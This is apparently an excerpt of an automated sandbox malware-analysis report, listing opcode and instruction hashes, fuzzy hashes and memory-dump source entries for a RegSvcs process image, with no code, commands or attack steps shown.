                                                                            • Opcode Fuzzy Hash: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
                                                                            • Instruction Fuzzy Hash: C851F0B1A0C3108BD704DF24E89126BB7B2EFE2358F18892DE4C59B391E739D506C75A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bc9fef166dd5496ef6ceaf1e2a8a6df33b96f85110195c366fdd9baca1aa122
                                                                            • Instruction ID: 09169ce3298d92eea6472291520ceeeb69e1a21e8ab5828b1ccc29de8c9eb78e
                                                                            • Opcode Fuzzy Hash: 7bc9fef166dd5496ef6ceaf1e2a8a6df33b96f85110195c366fdd9baca1aa122
                                                                            • Instruction Fuzzy Hash: AD514574A083218BC324CF59D89236BB3F1FF85704F44492DF9848B395E7789909CB8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b17885a6bfbbce7e50322f50b18ffad07276d7359f74504680f3407b5a97f3f
                                                                            • Instruction ID: 4356e0b44275961aef890112f9ded24ec9d48ae6f755a9185e8fc838a420a592
                                                                            • Opcode Fuzzy Hash: 2b17885a6bfbbce7e50322f50b18ffad07276d7359f74504680f3407b5a97f3f
                                                                            • Instruction Fuzzy Hash: 2C51C272604A508FC3398F3DD891666FBE2BB9531470C8A6DD8A6CB7D2D738E405CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed4c0fc3cab28bf690d727e877877fa73d2a7e819b5ef407fd0cf97e11a10734
                                                                            • Instruction ID: 9f9524e03ee008743a518672b965bd27adcbd914f2877ff32669ca8b509a8823
                                                                            • Opcode Fuzzy Hash: ed4c0fc3cab28bf690d727e877877fa73d2a7e819b5ef407fd0cf97e11a10734
                                                                            • Instruction Fuzzy Hash: 82412377B587000BA31CDE7A9C9316BF9E39BC6214F2ED53DC49ACB396E93C85064608
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 22119c604045783855c9f665eb46ea68fba03f10e7733bebb236ebf8922f9fa2
                                                                            • Instruction ID: 656276dd7e1dae3f01ce76c051d4e3b2132fe90f5ad23d18b5a05a3d66cfde08
                                                                            • Opcode Fuzzy Hash: 22119c604045783855c9f665eb46ea68fba03f10e7733bebb236ebf8922f9fa2
                                                                            • Instruction Fuzzy Hash: 5B31AE3675C7480BE714DF749895337FAD3DBD6318F0D503EC04197292E9A8D8094288
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 636d1c9bd8d2c55862d9f449e89db9ad978e94277065755bc9dbdfdfb4ea5689
                                                                            • Instruction ID: 4d249623180b0c2e6e828a2234bdf9e42cf2a0bcbaa669b47996c825abde182f
                                                                            • Opcode Fuzzy Hash: 636d1c9bd8d2c55862d9f449e89db9ad978e94277065755bc9dbdfdfb4ea5689
                                                                            • Instruction Fuzzy Hash: AF21F5355083825FE7418B34A4917ABBBE1CB93324F589E6DE0D297293D768C44BCB1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4a6d8e3c5b31bb15c42b56cbbf23dac4865dd0dd9320103428c7ddc5d2897d1
                                                                            • Instruction ID: 24313bebf8bd189c0fe35e9e1825c50ed8580f430db5fa180b5806889a76d3db
                                                                            • Opcode Fuzzy Hash: f4a6d8e3c5b31bb15c42b56cbbf23dac4865dd0dd9320103428c7ddc5d2897d1
                                                                            • Instruction Fuzzy Hash: 082122756083228FD310DFA5C85112BB7F1FF8A750F44986DE9D59B351E3789808C79A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction ID: f28c9c4e23fb0f831667b594d4aea64b3815eb4f033e86716a1d240f557620c5
                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction Fuzzy Hash: 61112933A081D44EC3128D3C84406A9BFA34AD7235F59539AF5F89B2D2D7268D8B8399
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5ce9a645a0e85fde848b1b17a72ffb4a4b126b943e49da30ff6a9de82397ccf
                                                                            • Instruction ID: 2b6c09d68eb8bba329e94fa5d497a944570c80518c9f2766836dc602e63e6c37
                                                                            • Opcode Fuzzy Hash: c5ce9a645a0e85fde848b1b17a72ffb4a4b126b943e49da30ff6a9de82397ccf
                                                                            • Instruction Fuzzy Hash: 41015EF160030157E720AE5594E1B2BA2A8AF98718F29663EE84857343DB7AEC05C69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5a5872f6fec6854479f84689dbca6aa1737de5e49f8ce2efccf45834e37143d
                                                                            • Instruction ID: 2d60535eb30d735f96a1e5fa547bdd4e535f1eba030aac4bdf18b9b6bdebcd65
                                                                            • Opcode Fuzzy Hash: d5a5872f6fec6854479f84689dbca6aa1737de5e49f8ce2efccf45834e37143d
                                                                            • Instruction Fuzzy Hash: FB110A36A182604BC754CF6448615B7B7D29F82614B1D457E8C95E7385C62FCD0E8AC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1cab1e5bc1623385779295eddcb0f75ce1460b49c418aa6e5c98035987fbf9ee
                                                                            • Instruction ID: 056fcb02a901166a3bcd98eadbcb5aefd492d11e42655132c9b34e8564ba8bdc
                                                                            • Opcode Fuzzy Hash: 1cab1e5bc1623385779295eddcb0f75ce1460b49c418aa6e5c98035987fbf9ee
                                                                            • Instruction Fuzzy Hash: D701C4206087928BD305CF399454327BBE29BD3314F1889AEE0D1D73D2CB79CC4A8B56
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04108728d60b9b7473b92bc2f38e6b2762a3711e90d5a366ea1267bd58152f49
                                                                            • Instruction ID: 91370234491c48341d1b32fcd386e8c46a18f39f5008db9c7630c7d4ed89aa12
                                                                            • Opcode Fuzzy Hash: 04108728d60b9b7473b92bc2f38e6b2762a3711e90d5a366ea1267bd58152f49
                                                                            • Instruction Fuzzy Hash: 8AF054255896C34AD3168B3A80B0732FBE14FAB255F1C25E5D4E187382DB2AEA099658
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3ddefed221d102455d9f6df1d0961a7330b6cd9747059ec875db45aa67025fd
                                                                            • Instruction ID: cee5a04db7c6a7700622fcb5f76ee1ddb9848a8fbe1dc9a6f488811b705ef408
                                                                            • Opcode Fuzzy Hash: f3ddefed221d102455d9f6df1d0961a7330b6cd9747059ec875db45aa67025fd
                                                                            • Instruction Fuzzy Hash: 9FD0127570C1404FE7599A3494A26A7B7E2C79B325F11686DD0C293652C216941B4E0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                            • Instruction ID: 2c901a7a29f66bf787f40720772bc8c584e69b152b80f66a481ebbf7ac839097
                                                                            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                            • Instruction Fuzzy Hash: F0D0A7715487A10E57588D3804A04B7FBE9EA87612B18159FE4D5E3209D624DC42469C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53d9efecdbc41310def01a24194b08a5b6974b30575c97dbe6098e8e43e52e2d
                                                                            • Instruction ID: d2b1bf2204416ed491fe5597db563d55677a20c645860d3af38da09da04eb3ad
                                                                            • Opcode Fuzzy Hash: 53d9efecdbc41310def01a24194b08a5b6974b30575c97dbe6098e8e43e52e2d
                                                                            • Instruction Fuzzy Hash: 93E06C7DA596218F9310DF58EC80D12B3B0B75B705762A0BADD00A7332DB30E81ACB4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1c5223367fba0a71086e661a1f683c7cfbac3f0ff12aae6a8d94f4e45a743fd1
                                                                            • Instruction ID: ccdf2ff349c7f4701b1dfec56dc2b62cf1f4e611b3be8f3cf6039e062017c520
                                                                            • Opcode Fuzzy Hash: 1c5223367fba0a71086e661a1f683c7cfbac3f0ff12aae6a8d94f4e45a743fd1
                                                                            • Instruction Fuzzy Hash: 5EB092A9C4241886E6197B113C125ABB0248913308F1D6436EC0632242A73BE21A81DF
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: GHH
                                                                            • API String ID: 3341692771-3392360184
                                                                            • Opcode ID: 18b3440c6482ca3f9d0b883c490c54257cea9635b6b4e9a92e1133ff8d32fa70
                                                                            • Instruction ID: 4a72f8dc8cd204c48d0b7db5c6f2cab64994286808cfb3299175447be1da39df
                                                                            • Opcode Fuzzy Hash: 18b3440c6482ca3f9d0b883c490c54257cea9635b6b4e9a92e1133ff8d32fa70
                                                                            • Instruction Fuzzy Hash: 82F039B9600A408FDB08FF39C894A6AB7B1BB89300F12053CDA468B724DA30A801CB05